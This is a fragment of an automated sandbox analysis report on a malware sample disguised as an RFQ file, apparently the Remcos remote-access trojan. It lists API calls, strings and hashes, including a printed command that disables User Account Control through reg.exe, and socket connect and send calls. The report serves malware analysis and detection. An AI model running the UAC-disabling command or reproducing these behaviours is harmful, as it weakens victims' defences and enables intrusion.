                            • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                            • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                            • Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                            • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: `AG
                            • API String ID: 1958988193-3058481221
                            • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                            • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                            APIs
                            • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                            • GetLastError.KERNEL32 ref: 0041CAA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                            • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                            • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                            • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                            • CloseHandle.KERNEL32(?), ref: 00406A14
                            Strings
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                            • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                            • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                            • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                            • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc$BG
                            • API String ID: 1818849710-2233081382
                            • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                            • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            • API String ID: 2993684571-305739064
                            • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                            • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                            • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                            • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                            APIs
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                            • Sleep.KERNEL32(00002710), ref: 00419F89
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                            • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                            • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                            • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            • API String ID: 3024135584-2418719853
                            • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                            • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                            • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                            • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                            • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                            APIs
                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                            • String ID:
                            • API String ID: 3525466593-0
                            • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                            • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                            • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                            • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                            APIs
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                              • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 4269425633-0
                            • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                            • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                            • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                            • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                            • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                            • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                            • __alloca_probe_16.LIBCMT ref: 0044FF68
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                            • __freea.LIBCMT ref: 0044FFD4
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                            • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                            • Opcode Fuzzy Hash: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                            • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                            • _free.LIBCMT ref: 0044E1B0
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                            • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                            • Opcode Fuzzy Hash: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                            • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                            APIs
                            • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                            • _free.LIBCMT ref: 00446F8D
                            • _free.LIBCMT ref: 00446FB4
                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                            • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                            • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                            • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                            APIs
                            • _free.LIBCMT ref: 0044F7C5
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 0044F7D7
                            • _free.LIBCMT ref: 0044F7E9
                            • _free.LIBCMT ref: 0044F7FB
                            • _free.LIBCMT ref: 0044F80D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                            • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                            • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                            APIs
                            • _free.LIBCMT ref: 00443315
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00443327
                            • _free.LIBCMT ref: 0044333A
                            • _free.LIBCMT ref: 0044334B
                            • _free.LIBCMT ref: 0044335C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                            • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                            • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                            APIs
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                            • IsWindowVisible.USER32(?), ref: 004167A1
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessWindow$Open$TextThreadVisible
                            • String ID: (FG
                            • API String ID: 3142014140-2273637114
                            • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                            • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                            • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                            • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                            APIs
                            • _strpbrk.LIBCMT ref: 0044D4B8
                            • _free.LIBCMT ref: 0044D5D5
                              • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                              • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                              • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                            • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                            • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                            • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                              • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                            • String ID: XCG$`AG$>G
                            • API String ID: 2334542088-2372832151
                            • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                            • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                            • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                            • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000104), ref: 00442724
                            • _free.LIBCMT ref: 004427EF
                            • _free.LIBCMT ref: 004427F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe
                            • API String ID: 2506810119-905787867
                            • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                            • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                            • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                            • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
